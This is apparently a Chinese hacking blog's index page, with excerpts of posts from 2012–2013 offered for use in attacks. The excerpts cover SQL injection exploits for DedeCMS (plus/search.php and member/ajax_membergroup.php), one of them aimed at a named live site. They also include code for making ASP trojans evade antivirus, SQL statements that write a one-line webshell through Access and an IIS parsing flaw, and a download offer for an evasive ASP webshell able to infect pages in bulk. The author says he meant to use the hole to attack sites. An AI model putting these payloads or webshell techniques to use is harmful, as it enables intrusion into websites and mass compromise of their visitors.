【火爆】dedecms plus/search.php 注入漏洞利用方式
2013-01-21哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
我一般是这样测试的:
提交 /plus/search.php?keyword=as&typeArr[1 uNion 1]=a
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
/plus/search.php?keyword=as&……
利用DEDECMS5.7最新注入漏洞拿站点【原创】
2012-11-22目标站点:
www.mumaasp.com
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)
返回内容:
20111227
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面
返回内容:
朋友 修改 (可以注入)
上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid fro......
Mumaasp发布——asp木马免杀工具代码
2012-11-06asp木马的简单免杀,只支持asp文件中<% %>中内容的简单加密
原理很简单,参考lake2的《ASP后门之终极伪装》,采用移位法加密ASP,因为处理比较麻烦,没有对整个asp文件加密,不过对一般的网马达到免杀效果,相关的工具有黑客伟的作品,只是提供一个思路,希望大家能做出更好的免杀工具
把要加密的asp脚本单独保存为asp文件即可,文件可以包含<% %>前后字串
主要部分代码:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, G……
ACCESS执行SQL语句导出一句话拿webshell
2012-10-19实用环境,在Access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。
逐一执行以下语句就可以导出一句话了
第一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select *......
免杀超越神界Asp大马 超强功能 提供免费下载
2012-10-12这款asp木马名字能唬住人,不过经黑友反应说免杀性能好。稳定性强,支持多款浏览器。
支持批量挂马(支持gb2312编码),批量清马,以及批量替换的功能。一次性替换百万个页面也不会脚本超时。批量挂马还有防清除功能。
大马分为四类,文件管理,信息收集,提升权限,其他
超越神界免杀Asp木马 默认密码: 下载后请及时修改!
如图:
强大的挂马功能!
下载地址:免杀超越神界Asp大马